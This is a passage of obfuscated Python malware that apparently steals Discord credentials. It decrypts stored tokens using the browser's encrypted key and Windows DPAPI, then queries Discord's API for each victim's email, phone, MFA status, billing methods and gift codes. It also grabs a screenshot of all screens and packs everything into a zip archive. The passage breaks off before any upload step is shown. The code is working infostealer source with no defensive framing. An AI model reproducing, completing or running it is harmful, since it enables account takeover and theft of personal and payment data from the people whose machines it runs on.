                                    if KXGDBVSJJEDFOKDMCGFQQYIZUMHFQSIMTGUMICJKAGFMVXCAEXMYRZZZEXBAWIKSFRKPOYDTLHILDPGOEIWETTDKJWKMQKXBG(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW, EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI):
                                        VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY = requests.get(EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI, headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW}).json()['id']
                                        if VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY not in QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO:
                                            TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB.append(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW)
                                            QZLHQIXZQWGMPDFYCAQRZVPKSKCAQDMIDVVDSAXKJREYYSDQFBSOCWVAHSEXSCKACLUKDYFZPHGOYDKLRQUIO.append(VUSVJEZEFEYBPAYYNFUPTFVQXGERTMWYPFTAPFMFFPKSCJGUOQOEACBRRGUWRWCEHIUIHUY)
                                            UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB[PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW] = ('Firefox', os.path.join(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, v4r__file))
        return TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB, UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB

    def KXGDBVSJJEDFOKDMCGFQQYIZUMHFQSIMTGUMICJKAGFMVXCAEXMYRZZZEXBAWIKSFRKPOYDTLHILDPGOEIWETTDKJWKMQKXBG(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW, EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI):
        return requests.get(EEACJIEWTAIRGBJJTAPIBCGURAKWBVDCUKAGGAVHTSZNQYZOECJOMWI, headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW}).status_code == 200

    def BEOQLFEJHCTKXHOXXAJDZJFKJMPSWIOFFFKRNXNNRXRTEEPDXDFGFLWWMQPBGGPJFSVILXPTAYXMMNVal(UZJFNLHTBPPXIWGFVJQLSHJBCUEHIXPRZFQUZJBFKIDIYAJLAXNKSWYGAYKZJWIUEBFXKCZWZHIQHDQHYPWKYVIMYZXIM, IYIXDYQGTJDFEXOOUKNNUVXYGRBDMNJUFPSXYSTGHMOGBYFCWSSKGHPBHRRYJIYGNEDSHCVRMUDNFRNIBCXGHZYCCIDVFB):
        ZVTKCVXXRNZRQINEDDPGMVREFYALOXREIURMMRJUDLYXTTCOPHVSSIRRETRLDUF = UZJFNLHTBPPXIWGFVJQLSHJBCUEHIXPRZFQUZJBFKIDIYAJLAXNKSWYGAYKZJWIUEBFXKCZWZHIQHDQHYPWKYVIMYZXIM[3:15]
        FWCLVQLGBKQICRKZXESZNQOQMBWCOFSCHJOUCYVSTIFTMEBTFEITPINLY = UZJFNLHTBPPXIWGFVJQLSHJBCUEHIXPRZFQUZJBFKIDIYAJLAXNKSWYGAYKZJWIUEBFXKCZWZHIQHDQHYPWKYVIMYZXIM[15:]
        AXJBQWBJKKPSOHPPVDEAKPPPCBFLZBPDSUVVIVTLFXYNBQQBUR = AES.new(IYIXDYQGTJDFEXOOUKNNUVXYGRBDMNJUFPSXYSTGHMOGBYFCWSSKGHPBHRRYJIYGNEDSHCVRMUDNFRNIBCXGHZYCCIDVFB, AES.MODE_GCM, ZVTKCVXXRNZRQINEDDPGMVREFYALOXREIURMMRJUDLYXTTCOPHVSSIRRETRLDUF)
        return AXJBQWBJKKPSOHPPVDEAKPPPCBFLZBPDSUVVIVTLFXYNBQQBUR.decrypt(FWCLVQLGBKQICRKZXESZNQOQMBWCOFSCHJOUCYVSTIFTMEBTFEITPINLY)[:-16].decode()

    def TLZQEGHNRLBNCIMNOMTBEICGSKCJKOLGZMUMSXSPQLTFXEZACFYIZVSIVTYOIPANHVT(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ):
        if not os.path.exists(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ):
            return None
        with open(PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ, "r", encoding="utf-8") as v4r_f:
            QKXELFXJSRDAQGFEEYFFOJFUZQQXPRIJFKXDIMULIDHPNJIHNLQCBJICVOOLQBTZDREXXUVBPAEUBQBBWDKGFSEKNRXMDCTJUMW = json.load(v4r_f)
        IYIXDYQGTJDFEXOOUKNNUVXYGRBDMNJUFPSXYSTGHMOGBYFCWSSKGHPBHRRYJIYGNEDSHCVRMUDNFRNIBCXGHZYCCIDVFB = base64.b64decode(QKXELFXJSRDAQGFEEYFFOJFUZQQXPRIJFKXDIMULIDHPNJIHNLQCBJICVOOLQBTZDREXXUVBPAEUBQBBWDKGFSEKNRXMDCTJUMW["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(IYIXDYQGTJDFEXOOUKNNUVXYGRBDMNJUFPSXYSTGHMOGBYFCWSSKGHPBHRRYJIYGNEDSHCVRMUDNFRNIBCXGHZYCCIDVFB, None, None, None, 0)[1]

    TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB, UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB = VIOEUNXHHFUHEPUJELLJJCVRBDZYKPPCMDHDWHEOTKYWFWIXOIOCUFFBPYX()
    
    if not TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB:
        HMRMAYDATFAVVYUOUGMIAAHSRIBFPUYNHDMLRQDTVPFCNEDHNKIOXHVJTQFEXSFRKMWQKZLSYBSNTPNBNPVJTFBE = "No discord tokens found."

    for PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW_d15c0rd in TSDUHDGBELRKRNJVTFETQKLCGGHHSLLXUZOCCQNMOJLZDWEPXSRDYPWIFWULPICBB:
        MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM += 1

        try: RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW_d15c0rd}).json()
        except: RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH = {"None": "None"}

        KMXWSNVMHYLKFIUGEJHPIKSPBXKCDPHYKFUFBWUMXMVVBJXMVBWUKUKPKWKATHISTOPS = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('username', "None") + '#' + RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('discriminator', "None")
        SSXWOUQSAVUXEAFJQYKFAISEOEFUORXWTEIFMNLVYLAVSSNVLUEOMLQEBKWJKGCXPTZLPLVIGZHNHKWBODRIW = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('global_name', "None")
        MRJHOKTKNMIKFHNESGTOTTNEXTGCINXVJBUEJJKLGAGGLHNPCTBMUMKRUZDEAXZVLXLWXWKWBZHFYVZXDETWFPVPXMIARLMHLWAV = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('id', "None")
        LSYOLQTHKBBXLCFYMRKTFCJUTNJNGSOQOWJZFTGPVSRYNFKMSJKKYUHKYOCOETKTFRMYTNYAGHLASKIRPZVWRUHFQJLVGVIT = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('email', "None")
        FHGLKCYZAZKEOAAXRAGHKZHCYCFNCLQIRGPEONDRELIQXPGCKHZRALEJGOGUEWRJHKXEGMJCEXBKBJUAZQP = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('verified', "None")
        CCNGZSNIDVSQDRFDWHYIKMJHOPLZTSQBAUSVPZSKIZPKFJDIUXABBBINYDJJVWVEOBUHUG = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('phone', "None")
        UFGDOSNBNCBJWTXRZCZGZVGQMAQJJIJGAPCUIRIUCGAQPFMIYDDSA = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('locale', "None")
        CTWAAXZJCANBHOALCLQEIFIWNILSFRGMGCEWFVWHEPKAFRVYKRWXJJSSHNREREEYMRKYUQDHHPFYFDAOVZOGJWRWUOBQDZ = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('mfa_enabled', "None")

        try:
            if RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('premium_type', 'None') == 0:
                VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM = 'False'
            elif RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('premium_type', 'None') == 1:
                VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM = 'Nitro Classic'
            elif RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('premium_type', 'None') == 2:
                VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM = 'Nitro Boosts'
            elif RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('premium_type', 'None') == 3:
                VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM = 'Nitro Basic'
            else:
                VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM = 'False'
        except:
            VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM = "None"

        try: WTUVDYEGJDBYLHYYOOGLDWGVMMXLXPLHGJYSTBHICFXJUSXYYEYSYSNPZNPBKUFOZJXICOCRGVGXSFVKZGUMPGJA = f"https://cdn.discordapp.com/avatars/{MRJHOKTKNMIKFHNESGTOTTNEXTGCINXVJBUEJJKLGAGGLHNPCTBMUMKRUZDEAXZVLXLWXWKWBZHFYVZXDETWFPVPXMIARLMHLWAV}/{RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{MRJHOKTKNMIKFHNESGTOTTNEXTGCINXVJBUEJJKLGAGGLHNPCTBMUMKRUZDEAXZVLXLWXWKWBZHFYVZXDETWFPVPXMIARLMHLWAV}/{RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{MRJHOKTKNMIKFHNESGTOTTNEXTGCINXVJBUEJJKLGAGGLHNPCTBMUMKRUZDEAXZVLXLWXWKWBZHFYVZXDETWFPVPXMIARLMHLWAV}/{RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH['avatar']}.png"
        except: WTUVDYEGJDBYLHYYOOGLDWGVMMXLXPLHGJYSTBHICFXJUSXYYEYSYSNPZNPBKUFOZJXICOCRGVGXSFVKZGUMPGJA = "None"

        try:
            OEAVLIPHYPIHGJPJFWHSOJVQKYMOEDBAOMGCFBRMUWAVOLAUILDCCRSOXCSOWEPZLW = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW_d15c0rd}).json()
            if OEAVLIPHYPIHGJPJFWHSOJVQKYMOEDBAOMGCFBRMUWAVOLAUILDCCRSOXCSOWEPZLW:
                YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL = []

                for v4r_method in OEAVLIPHYPIHGJPJFWHSOJVQKYMOEDBAOMGCFBRMUWAVOLAUILDCCRSOXCSOWEPZLW:
                    if v4r_method['type'] == 1:
                        YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL.append('Bank Card')
                    elif v4r_method['type'] == 2:
                        YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL.append("Paypal")
                    else:
                        YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL.append('Other')
                YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL = ' / '.join(YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL)
            else:
                YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL = "None"
        except:
            YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL = "None"

        try:
            JBFDZFFNWHMJJGQZSVKJPBKJTIHGWMBLRXWQBTUJPOVOVVMNDPVNHJIHQPDEULPEYTQQQLSCYEAIBNEJOEOA = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW_d15c0rd}).json()
            if JBFDZFFNWHMJJGQZSVKJPBKJTIHGWMBLRXWQBTUJPOVOVVMNDPVNHJIHQPDEULPEYTQQQLSCYEAIBNEJOEOA:
                ACQXOOYPRGUTXVRKGCKVRZUDATIICJKFZFMFRTXOENXMQLJEBSEHIMUXSELUXXRUCGLLABPQCKTGAAGWRUNKMIGQWVCLVHZNA = []
                for GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN in JBFDZFFNWHMJJGQZSVKJPBKJTIHGWMBLRXWQBTUJPOVOVVMNDPVNHJIHQPDEULPEYTQQQLSCYEAIBNEJOEOA:
                    YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW = GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN['promotion']['outbound_title']
                    GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN = GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN['code']
                    IDJLJJMKIATGUAIXXFYTLTSGQUBLCAYKYZJBAJZEHZUNOVSZGDZBFRUHJRROHXQJPAOJYDJPZGVSSRC = f"Gift: \"{YGXUMDNCHUYBJBJLZZBVQVSQZADEVLVLLIWJWSJMYZJFSUJYCXOJDVXBFYWNBRW}\" Code: \"{GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN}\""
                    if len('\n\n'.join(GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN)) + len(IDJLJJMKIATGUAIXXFYTLTSGQUBLCAYKYZJBAJZEHZUNOVSZGDZBFRUHJRROHXQJPAOJYDJPZGVSSRC) >= 1024:
                        break
                    ACQXOOYPRGUTXVRKGCKVRZUDATIICJKFZFMFRTXOENXMQLJEBSEHIMUXSELUXXRUCGLLABPQCKTGAAGWRUNKMIGQWVCLVHZNA.append(IDJLJJMKIATGUAIXXFYTLTSGQUBLCAYKYZJBAJZEHZUNOVSZGDZBFRUHJRROHXQJPAOJYDJPZGVSSRC)
                if len(ACQXOOYPRGUTXVRKGCKVRZUDATIICJKFZFMFRTXOENXMQLJEBSEHIMUXSELUXXRUCGLLABPQCKTGAAGWRUNKMIGQWVCLVHZNA) > 0:
                    GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN = '\n\n'.join(ACQXOOYPRGUTXVRKGCKVRZUDATIICJKFZFMFRTXOENXMQLJEBSEHIMUXSELUXXRUCGLLABPQCKTGAAGWRUNKMIGQWVCLVHZNA)
                else:
                    GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN = "None"
            else:
                GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN = "None"
        except:
            GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN = "None"
    
        try: v4r_software_name, PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ = UQFREWYZLJVZCELBCBKLMUBNGQDXWWWWJZHSFQTSDLLZZIZILKDUUHBXEPGALOMKXNZZTBPPEVKYPOZABMFB.get(PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW_d15c0rd, ("Unknown", "Unknown"))
        except: v4r_software_name, PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ = "Unknown", "Unknown"

        HMRMAYDATFAVVYUOUGMIAAHSRIBFPUYNHDMLRQDTVPFCNEDHNKIOXHVJTQFEXSFRKMWQKZLSYBSNTPNBNPVJTFBE = HMRMAYDATFAVVYUOUGMIAAHSRIBFPUYNHDMLRQDTVPFCNEDHNKIOXHVJTQFEXSFRKMWQKZLSYBSNTPNBNPVJTFBE + f"""
Discord Account n°{str(MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM)}:
 - Path Found      : {PRHTQDMAMBBBTJJEDRDSUSHIIJBTFVSOGCHLBIJOWLLDRNJOQASIFZETJ}
 - Software        : {v4r_software_name}
 - Token           : {PZXJLMSEQQFARERGFASUKXABWQWYANNGRVKSDUEIEJHJAJJRUBKYJYDKPIRRJHXPFFVQWDKSLWIBBDQSLOWFUAXVAUGLIRJGLW_d15c0rd}
 - Username        : {KMXWSNVMHYLKFIUGEJHPIKSPBXKCDPHYKFUFBWUMXMVVBJXMVBWUKUKPKWKATHISTOPS}
 - Display Name    : {SSXWOUQSAVUXEAFJQYKFAISEOEFUORXWTEIFMNLVYLAVSSNVLUEOMLQEBKWJKGCXPTZLPLVIGZHNHKWBODRIW}
 - Id              : {MRJHOKTKNMIKFHNESGTOTTNEXTGCINXVJBUEJJKLGAGGLHNPCTBMUMKRUZDEAXZVLXLWXWKWBZHFYVZXDETWFPVPXMIARLMHLWAV}
 - Email           : {LSYOLQTHKBBXLCFYMRKTFCJUTNJNGSOQOWJZFTGPVSRYNFKMSJKKYUHKYOCOETKTFRMYTNYAGHLASKIRPZVWRUHFQJLVGVIT}
 - Email Verified  : {FHGLKCYZAZKEOAAXRAGHKZHCYCFNCLQIRGPEONDRELIQXPGCKHZRALEJGOGUEWRJHKXEGMJCEXBKBJUAZQP}
 - Phone           : {CCNGZSNIDVSQDRFDWHYIKMJHOPLZTSQBAUSVPZSKIZPKFJDIUXABBBINYDJJVWVEOBUHUG}
 - Nitro           : {VNQOQQVKCYRACBYVHUOSUJUGFPFHISSKJRJRIGQDQLQPMNBZBBKABKBPFAARCUYTTEOLHLDKAHKSYIVXFTQVRHXQBIYRBVLUM}
 - Language        : {UFGDOSNBNCBJWTXRZCZGZVGQMAQJJIJGAPCUIRIUCGAQPFMIYDDSA}
 - Billing         : {YONWUAUWYHSCYESVMAVBDAOFGQXGZICPWOQGXMKCYTEKFKHMPIEXCGXQEQCCTFZNDAMBPXXL}
 - Gift Code       : {GNIVZVFTMPUEPWEXJFKQVMSLYIKMXSEYGPTINFKBECYPSZWYZXNIMWKMN}
 - Profile Picture : {WTUVDYEGJDBYLHYYOOGLDWGVMMXLXPLHGJYSTBHICFXJUSXYYEYSYSNPZNPBKUFOZJXICOCRGVGXSFVKZGUMPGJA}
 - Multi-Factor Authentication : {CTWAAXZJCANBHOALCLQEIFIWNILSFRGMGCEWFVWHEPKAFRVYKRWXJJSSHNREREEYMRKYUQDHHPFYFDAOVZOGJWRWUOBQDZ}
"""
    PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF.writestr(f"Discord Accounts ({MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM}).txt", HMRMAYDATFAVVYUOUGMIAAHSRIBFPUYNHDMLRQDTVPFCNEDHNKIOXHVJTQFEXSFRKMWQKZLSYBSNTPNBNPVJTFBE)

    return MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM

def RBTBMGOPRIPNYKRQYMZIVRPWDMRGEKGKIWYUFWGKYHACRULOSAVDYHMHTQVKYNGGVJWOHENMBRZZUNVN(zip_file):
    import io
    from PIL import ImageGrab

    try:
        UJBTEOJLYCZPBAJGMXFTTATRSCGIQIFBPZJRYAVSTPRKONLPPIBTDNLZTSS = "Yes"

        def C4ptur3():
            RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV = ImageGrab.grab(
                bbox=None,
                include_layered_windows=False,
                all_screens=True,
                xdisplay=None
            )
            RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV_bytes = io.BytesIO()
            RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV.save(RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV_bytes, format='PNG')
            RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV_bytes.seek(0)
            return RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV_bytes

        RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV_bytes = C4ptur3()
        zip_file.writestr("Screenshot.png", RRIJDWVUAAIHNRADFGMTAZYHEUVYSGWGCXKQVOIVCJFYMKDZNXFQHQZPVBQGAPLDWZRBWXFV_bytes.read())
        return UJBTEOJLYCZPBAJGMXFTTATRSCGIQIFBPZJRYAVSTPRKONLPPIBTDNLZTSS
    except Exception as e:
        UJBTEOJLYCZPBAJGMXFTTATRSCGIQIFBPZJRYAVSTPRKONLPPIBTDNLZTSS = f"Error: {e}"
        return UJBTEOJLYCZPBAJGMXFTTATRSCGIQIFBPZJRYAVSTPRKONLPPIBTDNLZTSS

OFAUVOGRWOYYMCWMQUWLGZBQYHMUGNWXRQHCXMYVMIIKFJROFPVIKBRVJBVVLIAMVKYVCUHFOXBSPORETPTHQYPXJFRUC = []

YUDHIIWTXRREPCXTTPKPSBPMDMXBJQLKDJDJIHDCQBVPEFZNXSLIYGJOACJRDWYCQFMFBCMHK = io.BytesIO()
with zipfile.ZipFile(YUDHIIWTXRREPCXTTPKPSBPMDMXBJQLKDJDJIHDCQBVPEFZNXSLIYGJOACJRDWYCQFMFBCMHK, "w", zipfile.ZIP_DEFLATED) as PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF:

    try: 
        FRYEXBRJZQAMUTSCTCZSFDTSPHYEZJYRFZLFAODTZMGHRNRRLRJBFZTRTGZSVLNGGDMANOYSVGHCNYAZCPKFHVGLJSE = CXWLMDGTDMHRKHGWXMNTHHZYXEHUBLEPFWIFRSMBYBOCFXUPVBUMNUSHKB()
    except Exception as e:
        FRYEXBRJZQAMUTSCTCZSFDTSPHYEZJYRFZLFAODTZMGHRNRRLRJBFZTRTGZSVLNGGDMANOYSVGHCNYAZCPKFHVGLJSE = f"Error: {e}"

    try: 
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info = QZDVYNJVUBGAVSWJOCQUDYUHWNNJDYJNRLKLEOKHYLTCJOPZYHHFRFP(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info = f"Error: {e}"

    try: 
        MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM = NQVTLQYTQPHRXWIWPQFXFCQRJPEFLCFXCAYKCHOLEKQROXXWENLMBOBVZLSGKBDZAPFFWWYEODLVKJXVFGBXEAOYSGZPTG(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF)
    except Exception as e:
        MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM = f"Error: {e}"

    try: 
